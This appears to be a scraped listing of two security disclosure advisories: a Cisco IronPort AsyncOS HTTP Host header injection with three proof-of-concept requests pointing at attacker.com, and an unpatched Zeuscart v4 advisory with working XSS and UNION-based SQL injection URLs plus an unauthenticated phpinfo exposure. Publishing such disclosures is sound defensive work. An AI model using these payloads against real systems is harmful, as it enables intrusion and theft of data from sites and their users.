http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6780 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6780 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE----- Source
-
Cisco Ironport AsyncOS HTTP Header Injection Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-021 Cisco Ironport SMA - AsyncOS 8.4.0-138 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2015-0624 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 20-02-2015: Vendor Advisory Release 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation of user supplied input when handling HTTP Host and X-Forwarded-Host request headers. An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a malicious website. PoC #1 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: ironport:8443:@[attacker.com] PoC #2 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: [attacker.com] PoC #3 GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Host: ironport:8443 X-Forwarded-Host: [attacker.com] References: http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE----- Source
-
Advisory: Multiple reflecting XSS-, SQLi and InformationDisclosure-vulnerabilities in Zeuscart v.4 Advisory ID: SROEADV-2015-12 Author: Steffen Rösemann Affected Software: Zeuscart v.4 Vendor URL: http://zeuscart.com/ Vendor Status: pending CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Software used for research: Mac OS X 10.10, Firefox 35.0.1 ========================== Vulnerability Description: ========================== ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and InformationDisclosure-vulnerabilities. ================== Technical Details: ================== ==== XSS === Reflecting XSS-vulnerabilities can be found in a common Zeuscart-installation in the following locations and could be exploited for example by crafting a link and make a registered user click on that link. The parameter "search", which is used in the index.php is vulnerable to XSS-attacks. Exploit-Example: http:// {TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!-- By appending arbitrary HTML- and/or JavaScript-code to the parameter "schltr" which is as well used in index.php, an attacker could exploit this XSS-vulnerable parameter: Exploit-Example: http:// {TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E The third XSS-vulnerability can be found in the "brand"-parameter, which is again used in index.php. Exploit-Example: http:// {TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E ==== SQLi ==== The SQL injection-vulnerabilities can be found in the administrative backend of Zeuscart v. 4 and reside in the following locations in a common installation. By appending arbitrary SQL statements to the "id"-parameter, an attacker could exploit this SQL injection vulnerability: Exploit-Example: http:// {TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+ Another SQL injection vulnerability can be found here and can be exploited by appending SQL statements to the vulnerable "cid"-parameter: Exploit-Example: http:// {TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+ The last SQL injection vulnerability I found can be found in the following location and can be exploited by appending SQL statements to the vulnerable "id" parameter: http:// {TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+ ============== Information Disclosure ============== The administrative backend of Zeuscart v. 4 allows the admin to use a functionality, which displays the PHP-installation settings via phpinfo(): http://{TARGET}/admin/?do=getphpinfo Unfortunately, the PHP-script does not check, if an authorized admin executes this functionality: It is possible even for unregistered users to request the above link to see the informations, phpinfo() displays. That could expose sensitive informations to an attacker which could lead to further exploitation. ========= Solution: ========= Vendor has been notified. After releasing a patch, which seems not to correct the issues, the vendor decided not to respond anymore to figure out a solution together. Currently, there is no patch available to secure Zeuscart-installations. ==================== Disclosure Timeline: ==================== 21-Jan-2015 – found the vulnerabilities 21-Jan-2015 - informed the developers (see [3]) 21-Jan-2015 – release date of this security advisory [without technical details] 21-Jan-2015 – fork of the repository to keep the vulnerable version available for other researchers (see [5]) 22-Jan-2015 - vendor responded, provided detailed information 04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are still exploitable, which has been reported to the vendor (see [3]) 19-Feb-2015 - asked the vendor again, if he will patch these issues (see [3]); vendor did not respond 21-Feb-2015 - release date of this security advisory 21-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://zeuscart.com/ [2] https://github.com/ZeusCart/zeuscart [3] https://github.com/ZeusCart/zeuscart/issues/28 [4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html [5] https://github.com/sroesemann/zeuscart Source